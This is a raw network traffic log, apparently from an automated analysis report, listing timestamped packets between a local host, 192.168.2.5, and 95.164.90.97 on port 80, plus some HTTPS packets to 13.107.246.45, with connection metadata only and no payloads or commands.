Oct 7, 2024 03:15:44.265522003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265535116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265573978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265579939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265624046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265634060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265681028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265682936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265716076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265729904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265763998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265768051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265801907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265810966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265847921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265853882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265901089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265903950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265937090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265957117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265974045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265986919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266021013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266033888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266067028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266072035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266120911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266122103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266160965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266175985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266205072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266211987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266264915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266297102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266314030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266330957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266345978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266364098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266379118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266401052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266412973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266433954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266449928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266467094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266480923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266499996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266514063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266530991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266546965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266562939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266575098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266596079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266612053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266644955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266690016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266724110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266736984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266756058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266769886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266788960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266803980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266820908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266834974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266854048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266868114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266886950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266899109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266921997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266932011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266954899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.266969919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.266988039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267000914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267019987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267031908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267052889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267069101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267086029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267101049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267118931 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267133951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267152071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267168999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267205954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267209053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267242908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267256975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267277002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267292023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267308950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267324924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267343044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267358065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267374992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267398119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267425060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267437935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267471075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267487049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267504930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267524004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267537117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267551899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267570019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267584085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267602921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267616987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267635107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267652035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267667055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267682076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267699957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267714024 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267731905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267765999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267797947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267800093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267811060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267832041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267833948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267863035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267863989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267884970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267898083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267915964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267930031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267955065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267962933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.267983913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.267995119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268028975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268032074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268062115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268064022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268090963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268098116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268115044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268130064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268162966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268178940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268197060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268212080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268230915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268244982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268263102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268277884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268296003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268309116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268327951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268345118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268361092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268382072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268397093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268409014 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268430948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268446922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268465042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268484116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268497944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.268518925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.268543959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.286883116 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.286955118 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.287055969 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.287080050 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.287240028 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.287367105 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.287405968 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.287427902 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.287436008 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.290710926 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.290740013 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.290823936 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.290968895 CEST	49866	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.290985107 CEST	443	49866	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.355143070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355197906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355232000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355264902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355317116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355366945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355436087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355457067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355457067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355457067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355457067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355469942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355496883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355521917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355525970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355555058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355578899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355587959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355597973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355638027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355640888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355674982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355689049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355706930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355724096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355741024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355756998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355788946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355791092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355842113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355843067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355889082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355896950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355945110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.355947971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355981112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.355995893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356014013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356028080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356045961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356062889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356096029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356097937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356147051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356148005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356198072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356199026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356232882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356278896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356282949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356333971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356334925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356367111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356383085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356405973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356415987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356453896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356456041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356503963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356507063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356563091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356574059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356595993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356611967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356643915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356646061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356681108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356695890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356729031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356731892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356781006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356784105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356817007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356832027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356867075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356867075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356914997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356923103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.356970072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.356971979 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357023001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357023954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357054949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357076883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357089043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357099056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357137918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357142925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357192039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357193947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357242107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357244968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357292891 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357300043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357331991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357342958 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357364893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357379913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357398033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357412100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357431889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357446909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357466936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357481956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357498884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357512951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357532024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357544899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357564926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357578993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357598066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357614994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357630968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357646942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357664108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357678890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357697010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357712984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357729912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357747078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357763052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357777119 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357794046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357809067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357826948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357841015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357861042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357876062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357897997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357908964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357925892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357948065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357958078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.357973099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.357990980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358006001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358025074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358040094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358057976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358072996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358089924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358107090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358123064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358138084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358155966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358169079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358191013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358202934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358222961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358238935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358258963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358272076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358290911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358308077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358331919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358347893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.358378887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.358391047 CEST	80	49782	95.164.90.97	192.168.2.5
